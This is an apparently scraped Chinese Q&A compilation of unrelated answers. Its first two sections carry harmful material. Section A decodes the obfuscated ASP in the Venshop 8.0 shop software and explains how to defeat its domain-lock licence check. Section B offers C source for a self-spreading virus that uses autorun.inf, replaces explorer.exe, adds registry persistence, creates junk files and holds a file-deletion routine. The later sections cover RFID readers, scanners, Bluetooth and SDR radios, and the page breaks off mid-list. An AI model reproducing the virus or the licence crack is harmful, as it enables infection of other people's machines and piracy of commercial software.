A. 誰幫我解ASP源碼
Venshop 8.0中config.asp文件對域名進行了綁定:
=======================================================================
加密文檔如下:第一段:
<%#@~^NgkAAA==@#@&/nDPM/G{/.\D mM+COW4NnmD`Jm[GN(RM+^W.[k+OJ*@#@&k;sxr/+sn1Y~e,WMWh,\x/4Wam/H/O+sJ@#@&M/GcGwxPk5s~1W xSFSq@#@&A+(xDkGcES+4Eb@#@&4WsnalL'M/GvJ4G:wCoJb@#@&/kDnxm:+{.dGvJkkO+UCs+E#@#@&/bYn;MV']n$En/D U+.7+M.lMkm8V/cJU2]#AI{g)HAJ#L]n;!+kY ?n.7+..m.km4snk`Jj/"qKK|HzH3r#@#@&:mk^xDkGcJslrsr#@#@&WlX'Dk{cJ6lXJb@#@&r1wxDk{`rk^2r#@#@&OVxDk{vJOVr#@#@&:kU'M/{`r:dUr#@#@&z:mNNMx./F`rXhl[[MJb@#@&^W9+x.kG`E^KNnJ*@#@&VGTW{D/F`rsWTWE#@#@&C4ko4O'M/GvE4+bo4YE#@#@&mhrND4'M/{crhk[O4Jb@#@&4kL4YD'DkGvEtkLtDYEb@#@&hb[Y4Y'Md{`rhbNOtOE*@#@&w4GYKtx.kG`E24WOW4E*@#@&^WK3Y{Dk{`rVGW0YEb@#@&VKG3alox./F`rVGWV2monJ*@#@&^WGV4lxLxM/{`rsKWV4l oJ*@#@&OW o%'M/{crYW LLr#@#@&dGDD4{DdGcEkW.Yrb@#@&2mjD\n.{DdGvEslr^{k+\Drb@#@&2m?D-nMj/.'M/GvEhlbV|Ed+.E*@#@&2|j+M\n.hl/dxM/{`rhmks|wm//r#@#@&2|?nx9HCUtlk^xDkG`rhCk^{k+UNhCbVE#@#@&2|?nU9HlUHm:n'MdF`EslbV{k+ [xm:nJ*@#@&3|?+ [HmxKH2n'M/F`E:Cr^{OXanJ*@#@&hmkVm.od'MdF`EslbV{M+TdJ*@#@&:mksmM+o1xDkG`rhCk^{M+LmEb@#@&hlbs{KD[nM/'.dF`E:mr^{GMND/r#@#@&:mks{KD[nMm'MdGvJ:mrs{KD9+.mEb@#@&d+MxDkGcEk+DEb@#@&d+MmD'.kGvJ/D|OJ*@#@&Wbm5xM/GvEWbm;rb@#@&Kk1;mxx.kGcJKrm${UE*@#@&.nT'./FcrDnTJ*@#@&TEdYKD[+M'.dF`JT;+kYWM[nDr#@#@&^WhhxO/4Gh{Dd{vJmGhs+UYk4KhE*@#@&4lKLbC/4WA'M/{cr4lK%km/tKAE#@#@&mNhkUd4WA'MdGvJC[skxd4KhE#@#@&4EGktKh'M/FcJ4EG/4WAE*@#@&7nxktWamd3bx{DdGcEk3rxrb@#@&0dVbx'.dF`E/0r Jb@#@&b0Pb/ ;V^`-+ /4Ga{/0rx*PY4nUP7+ /4W2mk3rx{EN0C;^YJ@#@&b0~kkU!Vsv0k3k #,Otx~0k3rU{JNWl!VYr@#@&YNk Nn6x.kGcJD%k Nnar#@#@&OLrl{.kGcrYLkmJ*@#@&TEU'M/{croE E#@#@&\(;O'M/F`E\8;DJb@#@&-hKD[xM/GcE7hGD9E*@#@&M/FRm^Wkn@#@&/nY,Dd{{xWD4k o@#@&dnY,Dk'd+.-D mMnlD+G8N+mOcrl[W98cDn1WMN/Yrb@#@&/5V{Jdn^+mD~YKwP8~MP6DK:~\nUktGw|-+ l[E@#@&Dd Kwnx,d$VS1W x~8~8@#@&D{r/{DdcrY{bdJ*@#@&bd"EK'M/cJrd.EGJ*@#@&b/zG!'DdcrkdXK;r#@#@&EMVy!W{./vJ;D^y;Gr#@#@&;D^XW!x./vJ!DsXG;r#@#@&arm.EGxM/`E2bm"EKE*@#@&ak1XW!'Md`rwrmHW;E*@#@&m[{b:o8x./vJmNmkhL8Jb@#@&CN|khLy'Ddcrl[{bhT E*@#@&lN|ksL&{Dd`rl[mb:o2E#@#@&l9mr:Tc{Dd`EC9{r:T*J*@#@&C9{E.s8'./vEmNm!D^FJ*@#@&CN|E.Vy'.dvJl9mEMV rb@#@&mN|E.VfxM/cJm[{!Dsfr#@#@&C9{;D^*{DdvJmN{!D^*J*@#@&DkR^sK/+@#@&/YPMdxxKY4kUo@#@&wEUmDrW P-n mW[nv\nxk4Kwb@#@&6WD,k{qPDW~Vxc-x/4Gw*@#@&bW~:bNv\nxd4KwSkBq#@!@*-AKDN~O4+U@#@&-xxm/1`:bNv-+ /4Wa~rS8## -4!Y@#@&rWP7+ @*q ~Dtnx@#@&\xx-xO1X@#@&nVknb0~7+ @!&yPD4+ @#@&\xx-x_OX@#@&+x9~r0@#@&7+Ulx-xC[14Dv\nU*@#@&nsk+@#@&7n lx7+ l[1tMcF2#@#@&x[~b0@#@&U+XY@#@&-nx1W9+x\nUm@#@&2 [PwEU^DkWUK8UCAA==^#~@%>
破解出來為:
<%
set rs7=server.createobject("adodb.recordset")
sql="select * from venshop_system"
rs7.open sql,conn,1,1
web=rs7("web")
homepage=rs7("homepage")
sitename=rs7("sitename")
siteurl=Request.ServerVariables("SERVER_NAME")&Request.ServerVariables("SCRIPT_NAME")
mail=rs7("mail")
fax=rs7("fax")
icp=rs7("icp")
tel=rs7("tel")
msn=rs7("msn")
ymaddr=rs7("ymaddr")
code=rs7("code")
logo=rs7("logo")
aheight=rs7("height")
awidth=rs7("width")
heightt=rs7("heightt")
widtht=rs7("widtht")
photoh=rs7("photoh")
lookt=rs7("lookt")
lookpage=rs7("lookpage")
lookhang=rs7("lookhang")
tongj=rs7("tongj")
sortb=rs7("sort")
E_Server=rs7("mail_sever")
E_ServerUser=rs7("mail_user")
E_ServerPass=rs7("mail_pass")
E_SendManMail=rs7("mail_sendmail")
E_SendManName=rs7("mail_sendname")
E_SendManType=rs7("mail_type")
mail_regs=rs7("mail_regs")
mail_regc=rs7("mail_regc")
mail_orders=rs7("mail_orders")
mail_orderc=rs7("mail_orderc")
ser=rs7("ser")
ser_t=rs7("ser_t")
oicq=rs7("oicq")
oicq_n=rs7("oicq_n")
reg=rs7("reg")
guestorder=rs7("guestorder")
commentshow=rs7("commentshow")
baojiashow=rs7("baojiashow")
adminshow=rs7("adminshow")
huoshow=rs7("huoshow")
venshop_skin=rs7("skin")
fskin=rs7("skin")
if isnull(venshop_skin) then venshop_skin="default"
if isnull(fskin) then fskin="default"
tjindex=rs7("tjindex")
tejia=rs7("tejia")
gun=rs7("gun")
vbut=rs7("vbut")
vword=rs7("vword")
rs7.close
set rs7=nothing
set rs=server.createobject("adodb.recordset")
sql="select top 1 * from venshop_venad"
rs.open sql,conn,1,1
t_is=rs("t_is")
iszuo=rs("iszuo")
isyou=rs("isyou")
urlzuo=rs("urlzuo")
urlyou=rs("urlyou")
piczuo=rs("piczuo")
picyou=rs("picyou")
ad_img1=rs("ad_img1")
ad_img2=rs("ad_img2")
ad_img3=rs("ad_img3")
ad_img4=rs("ad_img4")
ad_url1=rs("ad_url1")
ad_url2=rs("ad_url2")
ad_url3=rs("ad_url3")
ad_url4=rs("ad_url4")
rs.close
set rs=nothing
Function vencode(venshop)
for i=1 to len(venshop)
if mid(venshop,i,1)<>vword then
ven=asc(mid(venshop,i,1))-vbut
if ven>126 then
ven=ven-95
elseif ven<32 then
ven=ven+95
end if
vena=vena&chr(ven)
else
vena=vena&chr(13)
end if
next
vencode=vena
End Function %>
最後一段:
Function vencode(venshop)
for i=1 to len(venshop)
if mid(venshop,i,1)<>vword then
ven=asc(mid(venshop,i,1))-vbut
if ven>126 then
ven=ven-95
elseif ven<32 then
ven=ven+95
end if
vena=vena&chr(ven)
else
vena=vena&chr(13)
end if
next
vencode=vena
End Function %> 用來對第二段加密文檔進行解密
第二段加密文檔如下:
<%
venshopcom="iptu>mdbtf)sfrvftu/tfswfswbsjbcmft)#IUUQ`IPTU#**|jg!jotus)iptu-#csboemjgfnbmm#*=>1!boe!jotus)iptu-#2:3/279#*=>1!boe!iptu=?#mpdbmiptu#!boe!!iptu=?#238/1/1/2#!uifo|sftqpotf/sfejsf!#iuuq;00xxx/wfotipq/dpn0#|sftqpotf/foe|foe!jg|Gz`Vsm>Sfrvftu/TfswfsWbsjbcmft)#RVFSZ`TUSJOH#*|Gz`b>tqmju)Gz`Vsm-#'#*|sfejn!Gz`Dt)vcpvoe)Gz`b**|Po!Fssps!Sftvnf!Ofyu|gps!Gz`y>1!up!vcpvoe)Gz`b*|Gz`Dt)Gz`y*!>!mfgu)Gz`b)Gz`y*-jotus)Gz`b)Gz`y*-#>#*.2*|Ofyu|Gps!Gz`y>1!up!vcpvoe)Gz`Dt*|Jg!Gz`Dt)Gz`y*=?##!Uifo|Jg!Jotus)MDbtf)Sfrvftu)Gz`Dt)Gz`y***-#(#*=?1!ps!Jotus)MDbtf)Sfrvftu)Gz`Dt)Gz`y***-#boe#*=?1!ps!Jotus)MDbtf)Sfrvftu)Gz`Dt)Gz`y***-#tfmf#*=?1!ps!Jotus)MDbtf)Sfrvftu)Gz`Dt)Gz`y***-#vqebuf#*=?1!ps!Jotus)MDbtf)Sfrvftu)Gz`Dt)Gz`y***-#dis#*=?1!ps!Jotus)MDbtf)Sfrvftu)Gz`Dt)Gz`y***-#efmfuf&31gspn#*=?1!ps!Jotus)MDbtf)Sfrvftu)Gz`Dt)Gz`y***-#<#*=?1!ps!Jotus)MDbtf)Sfrvftu)Gz`Dt)Gz`y***-#jotfsu#*=?1!ps!Jotus)MDbtf)Sfrvftu)Gz`Dt)Gz`y***-#nje#*=?1!Ps!Jotus)MDbtf)Sfrvftu)Gz`Dt)Gz`y***-#nbtufs/#*=?1!Uifo|sftqpotf/Xsjuf!#=tdsjqu!mbohvbhf>(kbwbtdsjqu(?bmfsu)(Fssps""(*<ijtupsz/hp).2*<=0tdsjqu?#|Sftqpotf/Foe|Foe!Jg|Foe!Jg|Ofyu|Gvojpo!EfmTus)Tus*|Jg!JtOvmm)Tus*!Ps!JtFnquz)Tus*!Uifo|Tus>!##|Foe!Jg|EfmTus>Sfqmbdf)Tus-#<#-##*|EfmTus>Sfqmbdf)EfmTus-#(#-##*|EfmTus>Sfqmbdf)EfmTus-#'#-##*|EfmTus>Sfqmbdf)EfmTus-#!#-##*|EfmTus>Sfqmbdf)EfmTus-#?#-##*|EfmTus>Sfqmbdf)EfmTus-#&31#-##*|EfmTus>Sfqmbdf)EfmTus-#.#-##*|EfmTus>Sfqmbdf)EfmTus-#>#-##*|EfmTus>Sfqmbdf)EfmTus-#=#-##*|EfmTus>Sfqmbdf)EfmTus-#?#-##*|EfmTus>Sfqmbdf)EfmTus-#-##*|Foe!Gvojpo|Gvojpo!dilmphjo)vtfs`obnf*|tfu!st>tfswfs/dsfbufpckf)#bepec/sfdpsetfu#*|trm>#tfmf!+!gspn!wfotipq`vtfs!xifsf!vtfsobnf>(#'vtfs`obnf'#(#|st/pqfo!trm-dpoo-2-2|jg!st/fpg!uifo|Sftqpotf/Dppljft)#wfotipq#*)#vtfs`obnf#*>##|Sftqpotf/Dppljft)#wfotipq#*)#vtfs`qbtt#*>##|Sftqpotf/Dppljft)#wfotipq#*)#vtfs`dmbtt#*>##|sftqpotf/sfejsf!#mphjo/btq#|sftqpotf/foe|fmtf|vtfs`qbtt>st)#vtfsqbtt#*|foe!jg|st/dmptf|tfu!st>opuijoh|jg!usjn)Sfrvftu/Dppljft)#wfotipq#*)#vtfs`qbtt#**=?usjn)vtfs`qbtt*!uifo|Sftqpotf/Dppljft)#wfotipq#*)#vtfs`obnf#*>##|Sftqpotf/Dppljft)#wfotipq#*)#vtfs`qbtt#*>##|Sftqpotf/Dppljft)#wfotipq#*)#vtfs`dmbtt#*>##|sftqpotf/sfejsf!#mphjo/btq#|sftqpotf/foe|foe!jg|Foe!Gvojpo|Gvojpo!Tipxgmbti)jnh-xu-ih-pobnf*|sftqpotf/xsjuf!#=pckf!dmbttje>##dmtje;E38DEC7F.BF7E.22DG.:7C9.555664651111##!obnf>#'pobnf'#!dpefcbtf>##iuuq;00epxompbe/nbdspnfejb//dbc$wfstjpo>7-1-51-1##!cpsefs>##1##!xjeui>#'xu'#!ifjhiu>#'ih'#?#|sftqpotf/xsjuf!#=qbsbn!obnf>##npwjf##!wbmvf>#'jnh'#?#|sftqpotf/xsjuf!#=qbsbn!obnf>##rvbmjuz##!wbmvf>##Ijhi##?#|sftqpotf/xsjuf!#=fncfe!tsd>#'jnh'#!qmvhjotqbhf>##iuuq;00xxx/nbdspnfejb/dpn0hp0hfugmbtiqmbzfs##!uzqf>##bqqmjdbujpo0y.tipdlxbwf.gmbti##!obnf>#'pobnf'#!rvbmjuz>##Ijhi##!xjeui>#'xu'#!ifjhiu>#'ih'#?=0pckf?#|Foe!Gvojpo|Gvojpo!GpsnbuOvn)Ovn*|GpsnbuOvn>GpsnbuOvncfs)Ovn-3-.2*|Foe!Gvojpo"
execute(vencode(venshopcom))
%>
8.0以下版本將最後一句execcute(vencode(venshopcom))改為response.write(vencode(venshopcom))
起作用的是
host=lcase(request.servervariables("HTTP_HOST"))
if instr(host,"brandlifemall")<=0 and instr(host,"192.168")<=0 and host<>"localhost" and host<>"127.0.0.1" then
response.redirect "http://www.venshop.com/"
8.0版在加密文檔中輸出了一個alart,用上面的方法輸出被alart中斷沒法看到完整的解密文檔.把response.write改為文件輸出,從本地文件中獲得解密後的文檔,如下:
<%
host=lcase(request.servervariables("HTTP_HOST"))
if instr(host,"brandlifemall")<=0 and instr(host,"192.168")<=0 and host<>"localhost" and host<>"127.0.0.1" then
response.redirect "http://www.venshop.com/"
response.end
end if
Fy_Url=Request.ServerVariables("QUERY_STRING")
Fy_a=split(Fy_Url,"&")
redim Fy_Cs(ubound(Fy_a))
On Error Resume Next
for Fy_x=0 to ubound(Fy_a)
Fy_Cs(Fy_x) = left(Fy_a(Fy_x),instr(Fy_a(Fy_x),"=")-1)
Next
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 Or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End
End If
End If
Next
Function DelStr(Str)
If IsNull(Str) Or IsEmpty(Str) Then
Str= ""
End If
DelStr=Replace(Str,";","")
DelStr=Replace(DelStr,"'","")
DelStr=Replace(DelStr,"&","")
DelStr=Replace(DelStr," ","")
DelStr=Replace(DelStr,">","")
DelStr=Replace(DelStr,"%20","")
DelStr=Replace(DelStr,"-","")
DelStr=Replace(DelStr,"=","")
DelStr=Replace(DelStr,"<","")
DelStr=Replace(DelStr,">","")
DelStr=Replace(DelStr,"%","")
End Function
Function chklogin(user_name)
set rs=server.createobject("adodb.recordset")
sql="select * from venshop_user where username='"&user_name&"'"
rs.open sql,conn,1,1
if rs.eof then
Response.Cookies("venshop")("user_name")=""
Response.Cookies("venshop")("user_pass")=""
Response.Cookies("venshop")("user_class")=""
response.redirect "login.asp"
response.end
else user_pass=rs("userpass")
end if
rs.close
set rs=nothing
if trim(Request.Cookies("venshop")("user_pass"))<>trim(user_pass) then
Response.Cookies("venshop")("user_name")=""
Response.Cookies("venshop")("user_pass")=""
Response.Cookies("venshop")("user_class")=""
response.redirect "login.asp"
response.end
end if
End Function
Function Showflash(img,wt,hg,oname)
response.write ""
response.write ""
response.write ""
response.write ""
End Function
Function FormatNum(Num)
FormatNum=FormatNumber(Num,2,-1)
End Function
%>
將brandlifemall改為自己的域名,則破解成功.
另外,根據vencode函數逆推,可以得出加密函數,將明碼還原到加密狀態.
ps:8.0版本中vencode函數有兩個vword和vbut變數是從資料庫中提取的,值可能是出廠前隨即設定,也有可能是固定的,我的資料庫里vword="|" , vbut="1"
B. 關於計算機病毒源碼
即使是小病毒也不是太好編的
比如用C語言做的小病毒……
功能:
1.在所有磁碟的根目錄生成svchost.com和autorun.inf文件
2.生成病毒體:
c:\windows\wjview32.com
c:\windows\explorer.exe
c:\windows\system32\dllcache\explorer.exe
c:\windows\system\msmouse.dll
c:\windows\system32\cmdsys.sys
c:\windows\system32\mstsc32.exe
3.病毒體c:\windows\explorer.exe感染原explorer.exe文件,使其不需要修改注冊表做到啟動時在
explorer.exe前啟動
4.修改注冊表,在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
設置自啟動項(此操作不使用windowsAPI,防止用戶對病毒體的發現,並實現並行執行)
5.生成的autorun.inf改變磁碟的打開方式,使其在windows2000以上的系統無論選擇「打開」、「雙擊」、「資源管理器」等方式都無法打開分驅,而是以運行病毒的方式取而代之。
6.連鎖能力,將病毒體相連,實現相連復制更新
7.使用進程不斷調用進程,使得在任務管理里無法結束病毒進程
8.不斷搜索磁碟,只要發現未感染病毒的一律感染,病毒刪除後1秒內再建
9.生成垃圾文件(DESTORY_感染_任意數字)5個於C盤下
10.附帶刪除文件函數(為防止危害,本函數默認不執行)
本病毒到目前為止任何殺毒軟體都無法將其查殺(07年的)
本病毒單機默認使用對機器無害(破壞代碼已屏蔽)
提供病毒卸載程序(保存為X.BAT,雙擊運行即可卸載):
@echo off
echo SK-CHINA SVCHOST KILLER 2007.6
echo WRITE BY S.K
taskkill /im mstsc32.exe /f
del c:\windows\wjview32.com
del c:\windows\explorer.exe
del c:\windows\system32\dllcache\explorer.exe
del c:\windows\system\msmouse.dll
del c:\windows\system32\cmdsys.sys
del c:\windows\system32\mstsc32.exe
del c:\svchost.com
del c:\autorun.inf
del d:\svchost.com
del d:\autorun.inf
del e:\svchost.com
del e:\autorun.inf
del f:\svchost.com
del f:\autorun.inf
del g:\svchost.com
del g:\autorun.inf
del h:\svchost.com
del h:\autorun.inf
c:\windows\system\explorer.exe c:\windows\explorer.exe
c:\windows\system\explorer.exe c:\windows\system32\dllcache\explorer.exe
del c:\windows\system\explorer.exe
echo FINISH!
echo 如果本次清除後仍殘留有病毒,請再次運行本程序
pause
--------------------------------------------------------------------
核心代碼:(全部代碼請從附件中下載,請用DEV-CPP運行其中的工程文件,編譯後請將結果文件svchost.exe更名為svchost.com,否則本病毒無法發揮作用,請安心運行實驗,惡意代碼已屏蔽)
/*
SK-CHINA
SVCHOST virus WRITE BY S.K
Compiler:
DEV-CPP 4.9.9.2
*/
/* SVCHOST.C */
/* SVCHOST.EXE */
/* SVCHOST.COM */
#include<stdio.h> /*標准輸入輸出*/
#include<string.h> /*字元串操作*/
#include<stdlib.h> /*其它函數*/
#include<process.h> /*進程式控制制*/
#include<dir.h> /*目錄函數*/
#define SVCHOST_NUM 6 /*關鍵位置病毒復制數量*/
#define RUBBISH_NUM 5 /*垃圾文件數量*/
#define REMOVE_NUM 5 /*刪除文件數*/
/*====================================================================*/
/*
文件AUTORUN.INF內容:
1.自動運行SVCHOST.com
2.覆蓋默認打開命令,使用病毒體作為新的打開方式
3.覆蓋默認資源管理器命令,使病毒體作為新的命令方式
*/
char *autorun={"[AutoRun]\nopen=\"SVCHOST.com /s\"\nshell\\open=打開(&O)
\nshell\\open\\Command=\"SVCHOST.com /s\"\nshell\\explore=資源管理器(&X)
\nshell\\explore\\Command=\"SVCHOST.com /s\""};
/*=====================================================================*/
/*
添加註冊表項:
1.自動運行生成病毒體C:\windows\wjview32.com
*/
char *regadd={"REGEDIT4\n\n
[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]\n\"wjview32
\"=\"C:\\\\windows\\\\wjview32.com /s\""};
/*=====================================================================*/
/*
函數:復制文件
復制源:infile
目的地:outfile
成功返回0,失敗返回1
*/
int (char *infile,char *outfile)
{
FILE *input,*output;
char temp;
if(strcmp(infile,outfile)!=0 && ((input=fopen(infile,"rb"))!=NULL) && ((output=fopen
(outfile,"wb"))!=NULL))
{
while(!feof(input))
{
fread(&temp,1,1,input);
fwrite(&temp,1,1,output);
}
fclose(input);
fclose(output);
return 0;
}
else return 1;
}
/*=====================================================================*/
/*
函數:通過explorer自動運行
成功返回0,失敗返回1,2
*/
int autorun_explorer()
{
FILE *input;
if((input=fopen("c:\\windows\\system\\explorer.exe","rb"))!=NULL)
{
fclose(input);
remove("c:\\windows\\$temp$");
remove("c:\\windows\\system32\\dllcache\\$temp$");
return 1;
}
("c:\\windows\\explorer.exe","c:\\windows\\system\\explorer.exe");
rename("c:\\windows\\explorer.exe","c:\\windows\\$temp$");
rename("c:\\windows\\system32\\dllcache\\explorer.exe","c:\\windows\\system32
\\dllcache\\$temp$");
if(("SVCHOST.com","c:\\windows\\explorer.exe")==0 &&
("SVCHOST.com","c:\\windows\\system32\\dllcache\\explorer.exe")==0)
return 0;
else
return 2;
}
/*=====================================================================*/
/*
函數:添加註冊表項
成功返回0,失敗返回1
*/
int add_reg()
{
FILE *output;
if((output=fopen("$$$$$","w"))!=NULL)
{
fprintf(output,regadd);
fclose(output);
spawnl(1,"c:\\windows\\regedit.exe"," /s $$$$$",NULL);
}
}
/*=====================================================================*/
/*
函數:復制病毒 + Autorun.inf自動運行
*/
void _virus()
{
int i,k;
FILE *input,*output;
char *files_svchost[SVCHOST_NUM]=
{"svchost.com","c:\\windows\\wjview32.com","c:\\windows\\system\\MSMOUSE.DLL","c:\\windows\\syste
m32\\cmdsys.sys","c:\\windows\\system32\\mstsc32.exe","c:\\windows\\explorer.exe"};
char temp[2][20]={"c:\\svchost.com","c:\\autorun.inf"};
for(i=0;i<SVCHOST_NUM;i++)
{
if((input=fopen(files_svchost[i],"rb"))!=NULL)
{
fclose(input);
for(k=0;k<SVCHOST_NUM;k++)
{
(files_svchost[i],files_svchost[k]);
}
i=SVCHOST_NUM;
}
}
for(i=0;i<SVCHOST_NUM;i++)
{
if((input=fopen(files_svchost[i],"rb"))!=NULL)
{
fclose(input);
for(k=0;k<24;k++)
{
(files_svchost[i],temp[0]);
if((output=fopen(temp[1],"w"))!=NULL)
{
fprintf(output,"%s",autorun);
fclose(output);
}
temp[0][0]++;
temp[1][0]++;
}
i=SVCHOST_NUM;
}
}
}
/*=====================================================================*/
/*
函數:製造垃圾文件
*/
void make_rubbish()
{
int i;
FILE *output;
srand(0);
for(i=0;i<RUBBISH_NUM;i++)
{
int n;
char s[30];
n=rand();
sprintf(s,"C:\\DESTORY_感染_%d",n);
if((output=fopen(s,"w"))!=NULL)
{
fprintf(output,"%ld%s",n*n,s);
fclose(output);
}
}
}
/*=====================================================================*/
/*
函數:刪除文件
*/
void remove_files()
{
long done;
int i;
struct _finddata_t ffblk;
char *remove_files[3]={"*.txt","*.doc","*.xls"};
for(i=0;i<3;i++)
{
if(_findfirst(remove_files[i],&ffblk)==-1) continue;
while(!done)
{
remove(ffblk.name);
_findnext(done,&ffblk);
}
_findclose(done);
}
}
/*=====================================================================*/
/*
主程序
使用DEV-CPP 32位C工程 實現.C程序脫離命令行界面,於後台執行
*/
int main(int argc,char **argv)
{
int contral=0;
if(argc>1)
if(strcmp(argv[1],"/s")==0)
goto next1;
autorun_explorer();
spawnl(1,"c:\\windows\\system\\explorer.exe",NULL);
next1:
add_reg();
_virus();
make_rubbish();
/* remove_files(); */
spawnl(1,"c:\\windows\\system32\\mstsc32.exe"," /s",NULL);
return 0;
}
其他的恐怕只能告訴你網址了
比如黑客聯盟的http://www.chinahacker.com/
參考資料: http://hi..com/wubeip111/blog/item/3f63e20ad515cd1d95ca6bd2.html
C. 設計UHF RFID的讀寫器模塊,用R2000晶元,大概需要多長時間,價格是多少
如果買源碼自己開發,成本很高的了,要20萬以上,開發周期長,要半年以上,國內這樣開發的不超過五家,其他的一般都是拿調用庫,這個基本就成本低周期短。
D. 求 AS3992 Roger 超高頻讀寫器的 上位機 帶源碼示例
你可以到「中遠嵌入式」購買。Eleckits。他們有一款1:1奧地利微電子Roger版本的As3992的超高頻無源讀寫模塊。原廠資源資料很多。作為學習和開發用很方便。價格是原廠價格的三分之一都不到。性價比很高。
E. Accelerated Reader Program是什麼意思
Accelerated Reader Program
加速的讀寫程序
雙語例句
1
UHF RFID Reader Program code integrity, and can be used directly.
UHFRFID讀取器程序的源代碼完整,並可以直接使用。
2
Then this paper give a system design of reader program, verify and improve themethod in the project.
然後提出設計讀寫器的系統方案和實現方法,並在工程中進行驗證和改善。
F. 連接平板電腦的掃描槍是什麼型號
手持式掃描槍和平台式掃描槍的中間產品(這幾年有新的出現,因為是內置供電且體積小被稱為筆記本掃描槍)這種產品絕大多數採用CIS技術,光學解析度為300dpi,有彩色和灰度兩種,彩色型號一般為24位彩色。也有及少數小滾筒式掃描槍採用CCD技術,掃描效果明顯優於CIS技術的產品,但由於結構限制,體積一般明顯大於CIS技術的產品。小滾筒式的設計是將掃描槍的鏡頭固定,而移動要掃描的物件通過鏡頭來掃描,運作時就象列印機那樣,要掃描的物件必須穿過機器再送出,因此,被掃描的物體不可以太厚。這種掃描槍最大的好處就是,體積很小,但是由於使用起來有多種局限,例如只能掃描薄薄的紙張,范圍還不能超過掃描槍的大小。
平台式掃描槍
又稱平板式掃描槍、台式掃描槍,目前在市面上大部分的掃描槍都屬於平板式掃描槍,是現在的主流。這類掃描槍光學解析度在300dpi-8000dpi之間,色彩位數從24位到48位,掃描幅面一般為A4或者A3。平板式的好處在於像使用復印機一樣,只要把掃描槍的上蓋打開,不管是書本、報紙、雜志、照片底片都可以放上去掃描,相當方便,而且掃描出的效果也是所有常見類型掃描槍中最好的。
其它的還有大幅面掃描用的大幅面掃描槍、筆式掃描槍、條碼掃描槍、底片掃描槍(注意不是平板掃描槍加透掃,效果要好的多,價格當然也貴)、實物掃描槍(不是有實物掃描能力的平板掃描槍,有點類似於數碼相機),還有主要用於業印刷排版領域的滾筒式掃描槍等很多。
掃描槍的種類及其用途的區別,使得掃描槍價格也有很大的差距,數百元到數千上萬元的掃描槍也因為外觀及其使用環境的因素而不同。選擇一款合適的掃描槍會讓工作流程更為簡單、更為便捷。
G. bluetooth是什麼意思
bluetooth意思是:藍牙。
1、藍牙是一種支持設備短距離通信(一般10m內)的無線電技術。
2、能在包括行動電話、PDA、無線耳機、筆記本電腦、相關外設等之間進行無線信息交換。
3、利用「藍牙」技術,能夠有效地簡化移動通信終端設備之間的通信,也能夠簡化設備與網際網路Internet之間的通信,從而數據傳輸變得更加迅速高效。
4、藍牙採用分散式網路結構以及快跳頻和短包技術,支持點對點及點對多點通信,工作在全球通用的2.4GHz ISM(即工業、科學、醫學)頻段。其數據速率為1Mbps。
5、採用時分雙工傳輸方案實現全雙工傳輸。
H. 手機連接wifi後怎麼隱藏圖標
手機連接wifi後隱藏圖標的方法:
1、進入手機設置-WLAN項,把WIFI功能關閉,手機上面的WIFI圖標自然消失。
2、若要使用WIFI又要隱藏圖標,將手機root,使用Xposed框架對應模塊功能,將WIFI圖標隱藏。
3、不建議採用2的方法,這樣用戶無法知道當然是否使用了WIFI走流量,任意在上網過程中意外產生大量費用。
I. 基於Cortex-M3最小系統組成、各模塊的的作用
2021年,適用於任何預算的15種最佳軟體定義無線電(SDR) 對於嘗試挑選軟體定義無線電SDR設備時,各種各樣的產品可能會讓無數火腿小夥伴們不知所措。 我們在網上搜索了15個軟體定義無線電設備,讓您無需頭疼! 那麼2021年最好的SDR接收器或收發器是什麼呢? 答案是……很復雜! 選擇SDR電台時,有許多因素在起作用。 頻率范圍,發送/接收能力,復雜性,可用的固件和開源項目,當然還有成本! 以下列出了出色的SDR無線電設備,涵蓋了這個多樣化的頻譜,我們希望對軟體定義無線電感興趣的任何人都能找到適合他們的東西。
無需再拖延,以下是我們在2021年發布的15款軟體定義無線電清單!
1. HackRF One軟體定義無線電(SDR),ANT500和SMA天線適配器套件
HackRF One是我們列表中功能最強大且受支持最多的SDR之一,這就是為什麼我們首先列出它。HackRF One軟體定義的無線電能夠發送和接收(Tx / Rx)1MHz至6GHz的頻率。
NooElec HackRF One軟體定義無線電(SDR),ANT500和SMA天線適配器套件
盡管HackRF One SDR既可以發送也可以接收,但它只是半雙工的,這意味著它可以發送或接收,但不能同時發送和接收。該捆綁包包括啟動和運行SDR所需的一切:適配器,可將各種天線連接到HackRF One,包括F連接器,N連接器,BNC和PAL天線。以下是來自供應商的其他信息,描述了HackRF One SDR無線電。
Great Scott Gadgets的HackRF One是一款軟體定義的無線電外圍設備,能夠發送或接收1 MHz至6 GHz的無線電信號。HackRF One旨在支持現代和下一代無線電技術的測試和開發,它是一個開放源代碼硬體平台,可用作USB外設或編程用於獨立操作。
1 MHz至6 GHz的工作頻率
半雙工收發器
每秒多達2000萬個樣本
8位正交采樣(8位I和8位Q)
與GNU Radio,SDR#等兼容
可通過軟體配置的RX和TX增益以及基帶濾波器
軟體控制的天線埠電源(3.3 V時為50 mA)
SMA母天線連接器
SMA母時鍾輸入和輸出用於同步
方便的編程按鈕
內部擴展針腳
高速USB 2.0
USB供電
開源硬體
2. Nooelec NESDR Smart HF套裝
Nooelec NESDR SMArt HF套裝
Nooelec NESDR Smart HF捆綁包是一套完整且價格合理的工具包,其中包括接收HF頻段所需的一切。
該套件包括Nooelec NESDR無線電,Ham It Up轉換器,3種不同的天線,阻抗匹配的不平衡變壓器和互連適配器。Nooelec NESDR SMArt SDR與Ham It Up上變頻器的結合將使該裝置的工作頻率范圍為100kHz至1.7GHz。
3. RTL-SDR BLOG V3 R820T2 RTL2832U 1PPM TCXO HF校準Tee SMA軟體定義的無線電與偶極天線套件
